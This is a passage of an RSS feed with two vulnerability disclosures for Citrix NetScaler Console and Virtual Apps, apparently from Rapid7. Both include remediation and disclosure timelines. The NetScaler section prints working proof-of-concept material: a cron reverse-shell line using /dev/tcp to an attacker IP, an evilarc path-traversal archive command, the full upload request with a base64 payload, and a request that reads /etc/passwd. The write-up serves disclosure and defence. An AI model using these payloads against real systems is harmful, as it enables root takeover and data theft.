</span>        <span style='font-size: undefined;'>else:</span></pre><p style="direction: ltr;"><span style='font-size: undefined;'></span></p><p><span style='font-size: undefined;'>If the StyleBook archive is a tar-gzipped file, and the source file name ends with </span><span style='font-size: undefined;'><span data-type='inlineCode'>.tgz</span></span><span style='font-size: undefined;'> or </span><span style='font-size: undefined;'><span data-type='inlineCode'>.gz</span></span><span style='font-size: undefined;'>, the </span><span style='font-size: undefined;'><span data-type='inlineCode'>unzip_file()</span></span><span style='font-size: undefined;'> method uses </span><span style='font-size: undefined;'><span data-type='inlineCode'>tarfile.extractall()</span></span><span style='font-size: undefined;'> to extract the contents of the tar file, without validation, which is vulnerable to ZipSlip when processing malicious archives (see the warning in the official Python </span><a href="https://docs.python.org/3/library/tarfile.html#tarfile.TarFile.extractall" target="_self"><span style='font-size: undefined;'>docs</span></a><span style='font-size: undefined;'> for the function).</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>We identified that the arbitrary file write was occurring as user </span><span style='font-size: undefined;'><span data-type='inlineCode'>1000</span></span><span style='font-size: undefined;'> who has equivalent rights as the root user and could write to any file path on the system, including the root path (</span><span style='font-size: undefined;'><span data-type='inlineCode'>/</span></span><span style='font-size: undefined;'>). </span></p><p style="direction: ltr;"><span style='font-size: undefined;'>We created a cron job with a reverse shell, and included it in the malicious archive, attempting to write the BSD cronfile for the root user at </span><span style='font-size: undefined;'><span data-type='inlineCode'>/var/cron/tabs/root</span></span><span style='font-size: undefined;'> and trigger a shell as the root user.</span></p><p><span style='font-size: undefined;'></span></p><pre language="html"><span style='font-size: undefined;'>$ cat ~/poc/netscaler/root
SHELL=/usr/bin/bash
PATH=/sbin:/bin:/usr/sbin:/usr/bin:/usr/local/sbin:/usr/local/bin
MAILTO=""
* * * * * bash -i &gt;& /dev/tcp/192.168.178.103/4444 0&gt;&1</span>
<span style='font-size: undefined;'>$ python2 evilarc.py -d 7 -o unix -f /tmp/mystylebook.tar.gz -p var/cron/tabs/ ~/poc/netscaler/root
Creating /tmp/mystylebook.tar.gz containing ../../../../../../../var/cron/tabs/root</span></pre><p></p><p style="direction: ltr;"><span style='font-size: undefined;'>Uploading the malicious StyleBook caused the file to be written at </span><span style='font-size: undefined;'><span data-type='inlineCode'>/var/cron/tabs/root</span></span><span style='font-size: undefined;'> as user </span><span style='font-size: undefined;'><span data-type='inlineCode'>1000</span></span><span style='font-size: undefined;'>:</span></p><p><span style='font-size: undefined;'></span></p><pre language="html"><span style='font-size: undefined;'>bash-3.2# ls -la /var/cron/tabs      
total 12
drwx------  2 root  wheel  512 Apr  8 10:46 .
drwx------  3 root  wheel  512 Mar 26 16:16 ..
-rwxrw-r--  1 1000  1000   154 Apr  8 08:29 root</span></pre><p></p><p style="direction: ltr;"><span style='font-size: undefined;'>A shell is opened shortly after opening a netcat listener on the target host:</span></p><p><span style='font-size: undefined;'></span></p><pre language="html"><span style='font-size: undefined;'>$ nc -nvlp 4444
Listening on 0.0.0.0 4444
Connection received on 192.168.178.222 24032
bash: no job control in this shell
bash-3.2# id
uid=0(root) gid=0(wheel) groups=0(wheel),5(operator)</span></pre><p><span style='font-size: undefined;'></span></p><h4><span style='color:rgb(102, 102, 102);font-size: undefined;'>PoC</span></h4><p style="direction: ltr;"><span style='font-size: undefined;'>Create a malicious archive using </span><a href="https://github.com/ptoomey3/evilarc" target="_self"><span style='font-size: undefined;'>https://github.com/ptoomey3/evilarc</span></a><span style='font-size: undefined;'> or similar, i.e.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'><span data-type='inlineCode'>$ python2 evilarc.py -d 7 -o unix -f /tmp/mystylebook.tar.gz -p var/cron/tabs/ ~/poc/netscaler/root</span></span></p><p style="direction: ltr;"><span style='font-size: undefined;'>Upload the malicious archive as base64 data as with the below request to trigger the arbitrary file write:</span></p><p><span style='font-size: undefined;'></span></p><pre language="html">POST /stylebook/nitro/v2/config/stylebooks/actions/import?mode=async HTTP/1.1
Host: 192.168.178.222
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:137.0) Gecko/20100101 Firefox/137.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: http://192.168.178.222/admin_ui/mas/ent/html/main.html
Content-Type: application/json
If-Modified-Since: Thu, 01 Jan 1970 05:30:00 GMT
NITRO_WEB_APPLICATION: true
rand_key: c24e9915bab19188621de22342d01799
Content-Length: 426
Origin: http://192.168.178.222
Connection: keep-alive
Cookie: rdx_pagination_size=250%20Per%20Page; startin=/admin_ui/mas/ent/html/main.html; version_status=true; user_rand=undefined; skip_ftu_flow_temp=true; logged_in_user_name=nsroot; SESSID=##FFEE4BAEFEDE58E016290444E90C32A6CBEEE60AA677D697B7588E4FD185; license_types=3; url_enabled=1; domain_enabled=0; cr_enabled=0; sla_enabled=1
Priority: u=0
{"import":{"file_name":"mystylebook.tar.gz","content":"H4sICB7p9GcC/215c3R5bGVib29rLnRhcgDt0N1KwzAUB/Bc5ynCLnYhmJPTtckUOtiFMKGi4F4grcIGc5Wk3fObTi0DYV4IwuD/y8fJyQmBRGvSP/rBB2pCu6fO15FC23biL0xibT5EdoU5jUfZLBOcO1dw4dg6YdjatKWM+Ad97HxQSjR+17+dOfdb/estY7wQz6u7qiqpj4Hq7Z5qHzfyablelRRTfkvHaajGcTUudm36lJPCZ55S+bC8r9aP5WQi5ZX6bsPd6nqrFlNFL68H6pp34ptMs51rdmmYGeWJMospSykAAAAAAAAAAAAAAAAAAAAAAADgjA+RuElNACgAAA==","encoding":"base64"}}</pre><h3><span style='color:rgb(102, 102, 102);'></span></h3><h4><span style='color:rgb(102, 102, 102);'>Impact</span></h4><p style="direction: ltr;"><span style='font-size: undefined;'>This is an authenticated vulnerability which does reduce the risk of exploitation somewhat. However, there are known authentication bypass vulnerabilities affecting the same version of the software that could be leveraged to exploit this issue without authentication (CVE-2024-6235). Due to this, and the fact that the arbitrary file write is occurring as the root user, the impact of exploiting this issue is high and could potentially result in system takeover. </span></p><p></p><h3><span style='color:rgb(67, 67, 67);'>CVE-2025-4365: Authenticated Arbitrary File Read</span></h3><h4><span style='color:rgb(102, 102, 102);'>Overview</span></h4><p style="direction: ltr;"><span style='font-size: undefined;'>An authenticated admin user can craft a HTTP request to read arbitrary files on the system. Validation of the file path does not occur before the file content is returned, resulting in sensitive information disclosure.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>The NetScaler Console download API uses the </span><span style='font-size: undefined;'><span data-type='inlineCode'>/nitro/v1/download</span></span><span style='font-size: undefined;'> endpoint and is used for various download operations, a typical file download request being as follows, note the download path is included in the URL following the API endpoint, in the following example the path </span><span style='font-size: undefined;'><span data-type='inlineCode'>mas_agent_image/nsroot/templates/nsroot.yaml</span></span><span style='font-size: undefined;'> maps to to temporary path on the file system at: </span><span style='font-size: undefined;'><span data-type='inlineCode'>/var/mps/tenants/root/tenants/Owner/k8s_agt_temp/##F1BFBD39EEA5C2281699D1B2AEF97DF2B482813653C0F0F83AC0CEC506B7/nsroot/templates/nsroot.yaml</span></span></p><p><span style='font-size: undefined;'><span data-type='inlineCode'></span></span></p><pre language="html"><span style='font-size: undefined;'>GET /nitro/v1/download/mas_agent_image/nsroot/templates/nsroot.yaml HTTP/1.1
Host: 192.168.178.222
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:136.0) Gecko/20100101 Firefox/136.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: http://192.168.178.222/admin_ui/mas/ent/html/main.html
Connection: keep-alive
Cookie: rdx_pagination_size=25%20Per%20Page; skip_ftu_flow_temp=true; logged_in_user_name=nsroot; SESSID=##700D4869F24C83881ABB8A24396DFD0A6466CF71A6DB9BE8EDDDCF97191D; user_rand=undefined; startin=/admin_ui/mas/ent/html/main.html; version_status=true; license_types=3; url_enabled=1; domain_enabled=0; cr_enabled=0; sla_enabled=1
Upgrade-Insecure-Requests: 1
Priority: u=4</span></pre><p></p><p style="direction: ltr;"><span style='font-size: undefined;'>While reviewing Python source code on the NetScaler appliance, namely </span><span style='font-size: undefined;'><span data-type='inlineCode'>/mps/python/util/agentFileUploadDownload.py</span></span><span style='font-size: undefined;'>, an alternative usage of the download API was identified, see the following code snippet:</span></p><p></p><pre language="html"><span style='font-size: undefined;'>class agentFileUploadDownload:

</span>    <span style='font-size: undefined;'>def download(self, sessionid, serverIP, localPath, remotePath, agentId, rowid, token, customerid, servicename, traceinfo):
</span>        <span style='font-size: undefined;'>payload = ""
</span>        <span style='font-size: undefined;'>context = ""
</span>        <span style='font-size: undefined;'>global CERT_BUNDLE_PATH
</span>        <span style='font-size: undefined;'>file_name = os.path.basename(localPath)
</span>        <span style='font-size: undefined;'>if traceinfo and customerid:
</span>            <span style='font-size: undefined;'>context = "%s %s" %(traceinfo, customerid) 
</span>        <span style='font-size: undefined;'>try:
</span>            <span style='font-size: undefined;'>logger.info("Download file %s started from NetScaler Console %s" %(file_name, context))
</span>            <span style='font-size: undefined;'>if customerid == "Owner":
</span>                <span style='font-size: undefined;'>URL = "https://" + serverIP + "/nitro/v1/download"
</span>                <span style='font-size: undefined;'>CERT_BUNDLE_PATH = False
</span>            <span style='font-size: undefined;'>else:
</span>                <span style='font-size: undefined;'>URL = "https://" + serverIP + "/" + customerid + \
</span>                    <span style='font-size: undefined;'>"/" + servicename + "/nitro/v1/download"
</span>            <span style='font-size: undefined;'>headers = {'Authorization': "CWSAuth service=" + token, 'Cookie': 'SESSID=' + sessionid,
</span>                       <span style='font-size: undefined;'>'agent-id': agentId, 'file': remotePath, 'row-id': rowid, 'File-Source': 'Agent'}</span></pre><p></p><p style="direction: ltr;"><span style='font-size: undefined;'>The URL in the code equates to the same download API as before but the file path is not set in the URL but in a </span><span style='font-size: undefined;'><span data-type='inlineCode'>file</span></span><span style='font-size: undefined;'> header instead. Other interesting headers are also exposed. By using a combination of the </span><span style='font-size: undefined;'><span data-type='inlineCode'>file</span></span><span style='font-size: undefined;'> and </span><span style='font-size: undefined;'><span data-type='inlineCode'>Authorization</span></span><span style='font-size: undefined;'> headers disclosed above, it’s possible to read arbitrary files on the system.</span></p><h4><span style='color:rgb(102, 102, 102);'>PoC  </span></h4><p style="direction: ltr;"><span style='font-size: undefined;'>The following HTTP request and response highlights this issue, by using a dummy value for the </span><span style='font-size: undefined;'><span data-type='inlineCode'>Authorization</span></span><span style='font-size: undefined;'> header, and </span><span style='font-size: undefined;'><span data-type='inlineCode'>/etc/passwd</span></span><span style='font-size: undefined;'> for the </span><span style='font-size: undefined;'><span data-type='inlineCode'>file</span></span><span style='font-size: undefined;'> header, the content of the </span><span style='font-size: undefined;'><span data-type='inlineCode'>/etc/passwd</span></span><span style='font-size: undefined;'> file is included in the response. </span></p><p><span style='font-size: undefined;'></span></p><pre language="html"><span style='font-size: undefined;'>GET /nitro/v1/download HTTP/1.1
Host: 192.168.178.223
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:137.0) Gecko/20100101 Firefox/137.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: http://192.168.178.223/admin_ui/mas/ent/html/main.html
Connection: keep-alive
Cookie: user_rand=undefined; startin=/admin_ui/mas/ent/html/main.html; version_status=true; skip_ftu_flow_temp=true; logged_in_user_name=nsroot; SESSID=##42641EE25C0BCBCDF65CE5CDF4A119F51E0472A52D607E645794D553F9C6; license_types=3; url_enabled=1; domain_enabled=0; cr_enabled=0; sla_enabled=1
Priority: u=0
file: /etc/passwd
Authorization: CWSAuth service=XXX



HTTP/1.1 200 OK
Date: Tue, 08 Apr 2025 11:37:20 GMT
Connection: Keep-Alive
Referrer-Policy: strict-origin-when-cross-origin
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
Content-Type: application/octet-stream
Content-Disposition: attachment
Content-Transfer-Encoding: binary
Last-Modified: Tue, 08 Apr 2025 09:23:59 GMT
Content-Length: 1791

# $FreeBSD: releng/11.4/etc/master.passwd 359448 2020-03-30 17:11:21Z brooks $
#
root:*:0:0:Charlie &:/root:/usr/bin/bash
nsroot:*:0:0:Netscaler Root:/root:/mps/mpssh
daemon:*:1:1:Owner of many system processes:/root:/usr/sbin/nologin
operator:*:2:5:System &:/:/usr/sbin/nologin
bin:*:3:7:Binaries Commands and Source:/:/usr/sbin/nologin
...</span></pre><p><span style='color:rgb(102, 102, 102);'></span></p><h4><span style='color:rgb(102, 102, 102);'>Impact</span></h4><p style="direction: ltr;"><span style='font-size: undefined;'>This is an authenticated vulnerability, which does reduce the risk of exploitation somewhat. However, there are known authentication bypass vulnerabilities affecting the same version of the software that could be leveraged to exploit this issue without authentication (CVE-2024-6235). Though not as severe as the ability to write arbitrary files, reading arbitrary files is likely to lead to highly sensitive information disclosure which could be leveraged for additional attacks.  </span></p><h2>Remediation</h2><p style="direction: ltr;"><span style='font-size: undefined;'>The Arbitrary File Write vulnerability </span>CVE-2024-12284,<span style='font-size: undefined;'> was fixed in version </span><span data-type='inlineCode'>14.1-38.53</span> and <span data-type='inlineCode'>13.1-56.18</span><span style='font-size: undefined;'> of NetScaler Console. The Arbitrary File Read vulnerability </span>CVE-2025-4365, <span style='font-size: undefined;'>was fixed in version </span><span data-type='inlineCode'>14.1.47.46</span> and <span data-type='inlineCode'>13.1.58.32</span> of both NetScaler Console and NetScaler SDX. Users should ensure they have updated to these patched versions to mitigate the risk from these vulnerabilities.</p><p>For more information, please refer to the the vendor advisory for CVE-2025-4365 <a href="https://support.citrix.com/support-home/kbsearch/article?articleNumber=CTX694729&amp;articleURL=NetScaler_Console_and_NetScaler_SDX_SVM_Security_Bulletin_for_CVE_2025_4365" target="_self">here</a>, and the vendor advisory for CVE-2024-12284 <a href="https://support.citrix.com/external/article?articleUrl=CTX692579-netscaler-console-and-netscaler-agent-security-bulletin-for-cve202412284&amp;language=en_US" target="_self">here</a>.</p><h2>Rapid7 Customers</h2><p>InsightVM and Nexpose customers can assess their exposure to CVE-2025-4365 and CVE-2024-12284 in the NetScaler Console product, with authenticated checks available since the June 18 content release.</p><h2>Disclosure Timeline</h2><ul><li style="direction: ltr;"><span style='font-size: undefined;'>April 2025: Issues discovered by Calum Hutton</span></li><li style="direction: ltr;"><span style='font-size: undefined;'>April 9, 2025: Initial contact with Citrix</span></li><li style="direction: ltr;"><span style='font-size: undefined;'>April 11, 2025: Disclosure details provided to Citrix</span></li><li style="direction: ltr;"><span style='font-size: undefined;'>April 24, 2025: Citrix confirmed they could reproduce issue(s), suggested coordinated disclosure date around mid July. </span></li><li style="direction: ltr;"><span style='font-size: undefined;'>May 29, 2025: Citrix clarified they will not assign a CVE for the Arbitrary File Write via ZipSlip vulnerability as it does not affect the latest version of the product.</span></li><li style="direction: ltr;"><span style='font-size: undefined;'>June 17, 2025, Citrix announced early publication of CVE-2025-4365 for the Arbitrary File Read vulnerability </span></li><li style="direction: ltr;"><span style='font-size: undefined;'>June 18, 2025: Public disclosure via publication of this blog post</span></li><li>June 25, 2025: Citrix provide Rapid7 with the CVE identifier CVE-2024-12284 for the Arbitrary File Write via ZipSlip vulnerability</li></ul>]]></description>
      <link>https://www.rapid7.com/blog/post/cve-2025-4365-cve-unassigned-netscaler-console-sdx-authenticated-arbitrary-file-read-write-fixed</link>
      <guid isPermaLink="false">bltb4963fe55f0b8c57</guid>
      <category><![CDATA[Rapid7 Disclosure]]></category>
      <category><![CDATA[Vulnerability Disclosure]]></category>
      <category><![CDATA[Vulnerability Management]]></category>
      <category><![CDATA[Research]]></category><dc:creator><![CDATA[Calum Hutton]]></dc:creator>
      <pubDate>Mon, 14 Jul 2025 14:07:51 GMT</pubDate><media:content url="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blt6b37729ea1f9c63a/6852f75667f5825dce799a46/vuln-disclosure-banner.jpeg" medium="image" />
    </item>
    <item>
      <title><![CDATA[CVE-2025-6759: Citrix Virtual Apps and Desktops - Local Privilege Escalation (FIXED)]]></title>
      <description><![CDATA[<h2 style="direction: ltr;">Overview</h2><p style="direction: ltr;"><span style='font-size: undefined;'>During a Virtual Desktop Infrastructure (VDI) breakout assessment, Rapid7 identified a Local Privilege Escalation (LPE) vulnerability affecting Citrix Virtual Apps and Desktops. This issue was assigned CVE-2025-6759 and has a CVSS score of </span><a href="https://www.first.org/cvss/calculator/4-0#CVSS:4.0/AV:L/AC:H/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"><span style='font-size: undefined;'>7.3 (High)</span></a><span style='font-size: undefined;'>.</span><br/><br/><span style='font-size: undefined;'>Rapid7 observed a SYSTEM process handle with “PROCESS_ALL_ACCESS” rights from “GfxMgr.exe” being leaked into the “CtxGfx.exe” process. Since the privileged process handle is being leaked into a process that a low privileged user owns, no special privileges are required to duplicate it and spawn a new process using the process handle.</span></p><h2 style="direction: ltr;">Product description</h2><p style="direction: ltr;"><span style='font-size: undefined;'>Citrix Virtual Apps and Desktops (formerly XenApp and XenDesktops) is an application and desktop virtualization solution that enables secure remote access to windows based applications and desktops.</span></p><h2 style="direction: ltr;">Impact</h2><p style="direction: ltr;"><span style='font-size: undefined;'>This vulnerability would allow a low privileged user to duplicate a leaked SYSTEM process handle to spawn a new process as SYSTEM.</span></p><h2 style="direction: ltr;">Credit</h2><p style="direction: ltr;"><span style='font-size: undefined;'>This vulnerability was discovered by Brandon Fisher, Security Consultant at Rapid7, and is being disclosed in accordance with </span><a href="https://www.rapid7.com/security/disclosure/"><span style='font-size: undefined;'>Rapid7's vulnerability disclosure policy</span></a><span style='font-size: undefined;'>.</span></p><h2 style="direction: ltr;">Exploitation</h2><p style="direction: ltr;"><span style='font-size: undefined;'>This image showcases the current Citrix products and versions running on the vulnerable machine:</span></p><p><span style='font-size: undefined;'></span></p><figure style="margin: 0"><img src="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blt53184643053d2c8d/686ce5e616748251fa1b20ef/cve_2025_6759_image1.png" class="embedded-asset" content-type-uid="sys_assets" type="asset" alt="cve_2025_6759_image1.png" asset-alt="cve_2025_6759_image1.png" style="width: auto" data-sys-asset-filelink="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blt53184643053d2c8d/686ce5e616748251fa1b20ef/cve_2025_6759_image1.png" data-sys-asset-uid="blt53184643053d2c8d" data-sys-asset-filename="cve_2025_6759_image1.png" data-sys-asset-contenttype="image/png" data-sys-asset-alt="cve_2025_6759_image1.png" sys-style-type="display"/></figure><p><span style='font-size: undefined;'></span></p><p><span style='font-size: undefined;'>This image displays the current low-privileged users identity, and its privileges:</span></p><p><span style='font-size: undefined;'></span></p><figure style="margin: 0"><img src="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blt56d097967376c5f5/686ce605588d46b6a6838b82/cve_2025_6759_image2.png" class="embedded-asset" content-type-uid="sys_assets" type="asset" alt="cve_2025_6759_image2.png" asset-alt="cve_2025_6759_image2.png" style="width: auto" data-sys-asset-filelink="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blt56d097967376c5f5/686ce605588d46b6a6838b82/cve_2025_6759_image2.png" data-sys-asset-uid="blt56d097967376c5f5" data-sys-asset-filename="cve_2025_6759_image2.png" data-sys-asset-contenttype="image/png" data-sys-asset-alt="cve_2025_6759_image2.png" sys-style-type="display"/></figure><p><span style='font-size: undefined;'></span></p><p><span style='font-size: undefined;'>Using a modified version of the public tool “GiveMeAHand”, Rapid7 discovered a SYSTEM process handle with “PROCESS_ALL_ACCESS” rights being leaked into the “CtxGfx.exe” process, which the low-privileged user owns:</span></p><p><span style='font-size: undefined;'></span></p><figure style="margin: 0"><img src="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blt78fa50edfe06feef/686ce6254e32554fae569377/cve_2025_6759_image3.png" class="embedded-asset" content-type-uid="sys_assets" type="asset" alt="cve_2025_6759_image3.png" asset-alt="cve_2025_6759_image3.png" style="width: auto" data-sys-asset-filelink="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blt78fa50edfe06feef/686ce6254e32554fae569377/cve_2025_6759_image3.png" data-sys-asset-uid="blt78fa50edfe06feef" data-sys-asset-filename="cve_2025_6759_image3.png" data-sys-asset-contenttype="image/png" data-sys-asset-alt="cve_2025_6759_image3.png" sys-style-type="display"/></figure><p><span style='font-size: undefined;'></span></p><p><span style='font-size: undefined;'>Rapid7 utilized the proof of concept tool to duplicate the leaked SYSTEM process handle and spawn a new SYSTEM process:</span></p><p><span style='font-size: undefined;'></span></p><figure style="margin: 0"><img src="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/bltf4a40cb2ad22b2ec/686ce63ec4493c456ea98ac4/cve_2025_6759_image4.png" class="embedded-asset" content-type-uid="sys_assets" type="asset" alt="cve_2025_6759_image4.png" asset-alt="cve_2025_6759_image4.png" style="width: auto" data-sys-asset-filelink="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/bltf4a40cb2ad22b2ec/686ce63ec4493c456ea98ac4/cve_2025_6759_image4.png" data-sys-asset-uid="bltf4a40cb2ad22b2ec" data-sys-asset-filename="cve_2025_6759_image4.png" data-sys-asset-contenttype="image/png" data-sys-asset-alt="cve_2025_6759_image4.png" sys-style-type="display"/></figure><p><span style='font-size: undefined;'></span></p><p><span style='font-size: undefined;'>This screenshot shows the current user is now “NT AUTHORITY\SYSTEM”, and possesses a very limited set of privileges within this process. From here, you could add yourself as a local administrator, or perform other actions with the SYSTEM account:</span></p><p><span style='font-size: undefined;'></span></p><figure style="margin: 0"><img src="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/bltb8cf4120fd333e59/686ce65228e27153aea3c1f8/cve_2025_6759_image5.png" class="embedded-asset" content-type-uid="sys_assets" type="asset" alt="cve_2025_6759_image5.png" asset-alt="cve_2025_6759_image5.png" style="width: auto" data-sys-asset-filelink="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/bltb8cf4120fd333e59/686ce65228e27153aea3c1f8/cve_2025_6759_image5.png" data-sys-asset-uid="bltb8cf4120fd333e59" data-sys-asset-filename="cve_2025_6759_image5.png" data-sys-asset-contenttype="image/png" data-sys-asset-alt="cve_2025_6759_image5.png" sys-style-type="display"/></figure><p><span style='font-size: undefined;'></span></p><p><span style='font-size: undefined;'>After obtaining administrative privileges, Rapid7 used Process Hacker to analyze the vulnerable applications. Rapid7 observed that the “GfxMgr.exe” process was a child process to PicaSessionAgent, which is also a child process of winlogon, both of which are running as “NT AUTHORITY\SYSTEM”:</span></p><p><span style='font-size: undefined;'></span></p><figure style="margin: 0"><img src="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/bltf99bd0de65f83ce1/686ce6676cdceeb1dec36a14/cve_2025_6759_image6.png" class="embedded-asset" content-type-uid="sys_assets" type="asset" alt="cve_2025_6759_image6.png" asset-alt="cve_2025_6759_image6.png" style="width: auto" data-sys-asset-filelink="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/bltf99bd0de65f83ce1/686ce6676cdceeb1dec36a14/cve_2025_6759_image6.png" data-sys-asset-uid="bltf99bd0de65f83ce1" data-sys-asset-filename="cve_2025_6759_image6.png" data-sys-asset-contenttype="image/png" data-sys-asset-alt="cve_2025_6759_image6.png" sys-style-type="display"/></figure><p><span style='font-size: undefined;'></span></p><p><span style='font-size: undefined;'>Inspecting both processes shows they are both Citrix signed applications associated with graphics handling. They are components of the High Definition User Experience (HDX) package within the Citrix Virtual Apps and Desktops platform and reside in “C:\program files\Citrix\HDX\bin”:</span></p><p><span style='font-size: undefined;'></span></p><figure style="margin: 0"><img src="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blt4a59ee0a5ad42882/686ce67c8f61ad30c4dc71bc/cve_2025_6759_image7.png" class="embedded-asset" content-type-uid="sys_assets" type="asset" alt="cve_2025_6759_image7.png" asset-alt="cve_2025_6759_image7.png" style="width: auto" data-sys-asset-filelink="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blt4a59ee0a5ad42882/686ce67c8f61ad30c4dc71bc/cve_2025_6759_image7.png" data-sys-asset-uid="blt4a59ee0a5ad42882" data-sys-asset-filename="cve_2025_6759_image7.png" data-sys-asset-contenttype="image/png" data-sys-asset-alt="cve_2025_6759_image7.png" sys-style-type="display"/></figure><p><span style='font-size: undefined;'></span></p><p><span style='font-size: undefined;'><em>Note:</em></span><span style='font-size: undefined;'> These images were taken after machine reboot so the PIDs are different from the original exploitation screenshot. At this point, access to the environment was restricted, and further analysis could not be completed.</span></p><h2 style="direction: ltr;">Remediation</h2><p style="direction: ltr;"><span style='font-size: undefined;'>To fully remediate against CVE-2025-6759, users running a Current Release (CR) of the product should update to the following versions:</span></p><ul><li style="direction: ltr;"><p style="direction: ltr;"><span style='font-size: undefined;'>Citrix Virtual Apps and Desktops 2503 and later versions</span></p></li></ul><p style="direction: ltr;"><span style='font-size: undefined;'>Users running a Long Term Service Release (LTSR) of the product should update to the following versions:</span></p><ul><li style="direction: ltr;"><p style="direction: ltr;"><span style='font-size: undefined;'>Citrix Virtual Apps and Desktops 2402 LTSR CU1 Update 1</span></p></li><li style="direction: ltr;"><p style="direction: ltr;"><span style='font-size: undefined;'>Citrix Virtual Apps and Desktops 2402 LTSR CU2 Update 1</span></p></li></ul><p style="direction: ltr;"><span style='font-size: undefined;'>For users who cannot apply the above versions, the vendor has made a temporary workaround available. For additional details, please see the </span><a href="https://support.citrix.com/support-home/kbsearch/article?articleNumber=CTX694820&amp;articleURL=Windows_Virtual_Delivery_Agent_for_CVAD_and_Citrix_DaaS_Security_Bulletin_CVE_2025_6759"><span style='font-size: undefined;'>vendor advisory</span></a><span style='font-size: undefined;'>.</span></p><h2 style="direction: ltr;">Customer remediation</h2><p>The Rapid7 pentesting team routinely discovers product vulnerabilities during the course of customer engagements. Upon discovering the vulnerabilities outlined in this disclosure, the team informed the customer and included the customer in debriefs related to ongoing disclosure-related communications. Rapid7 has been actively involved in coordination with the customer to secure the customer environment and confirm all Citrix services are properly patched and up-to-date as patches for the service are released.</p><h2>Rapid7 customers</h2><p><span style='font-size: undefined;'>InsightVM and Nexpose customers can assess their exposure to CVE-2025-6759 with an authenticated check expected to be available in the July 8 content release.</span></p><h2 style="direction: ltr;">Disclosure timeline</h2><ul><li style="direction: ltr;"><p style="direction: ltr;"><span style='font-size: undefined;'><strong>March 2025:</strong></span><span style='font-size: undefined;'> Issue discovered by Brandon Fisher.</span></p></li><li style="direction: ltr;"><p style="direction: ltr;"><span style='font-size: undefined;'><strong>April 11, 2025:</strong></span><span style='font-size: undefined;'> Initial disclosure to Citrix.</span></p></li><li style="direction: ltr;"><p style="direction: ltr;"><span style='font-size: undefined;'><strong>April 11, 2025:</strong></span><span style='font-size: undefined;'> Citrix acknowledges disclosure.</span></p></li><li style="direction: ltr;"><p style="direction: ltr;"><span style='font-size: undefined;'><strong>April 24, 2025:</strong></span><span style='font-size: undefined;'> Citrix confirmed they could reproduce the issue.</span></p></li><li style="direction: ltr;"><p style="direction: ltr;"><span style='font-size: undefined;'><strong>July 8, 2025:</strong></span><span style='font-size: undefined;'> Public disclosure via publication of this blog post (planned).</span></p></li></ul><h2 style="direction: ltr;"> References</h2><ul><li style="direction: ltr;"><p style="direction: ltr;"><a href="https://aptw.tf/2022/02/10/leaked-handle-hunting.html"><span style='font-size: undefined;'>https://aptw.tf/2022/02/10/leaked-handle-hunting.html</span></a></p></li><li style="direction: ltr;"><p style="direction: ltr;"><a href="https://web.archive.org/web/20240110040601/https://dronesec.pw/blog/2019/08/22/exploiting-leaked-process-and-thread-handles/"><span style='font-size: undefined;'>https://web.archive.org/web/20240110040601/https://dronesec.pw/blog/2019/08/22/exploiting-leaked-process-and-thread-handles/</span></a></p></li><li style="direction: ltr;"><p style="direction: ltr;"><a href="https://github.com/bananabr/Givemeahand"><span style='font-size: undefined;'>https://github.com/bananabr/Givemeahand</span></a></p></li></ul>]]></description>
      <link>https://www.rapid7.com/blog/post/cve-2025-6759-citrix-virtual-apps-and-desktops-fixed</link>
      <guid isPermaLink="false">blt612fdc13e7ee241b</guid>
      <category><![CDATA[Vulnerability Disclosure]]></category>
      <category><![CDATA[Vulnerability Management]]></category>
      <category><![CDATA[Research]]></category><dc:creator><![CDATA[Brandon Fisher]]></dc:creator>
      <pubDate>Mon, 14 Jul 2025 14:07:39 GMT</pubDate><media:content url="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blt11e9686cec540b6e/6849381f7431da65da41b88f/post-hero-vulnerability.webp" medium="image" />
    </item>
  </channel>
</rss>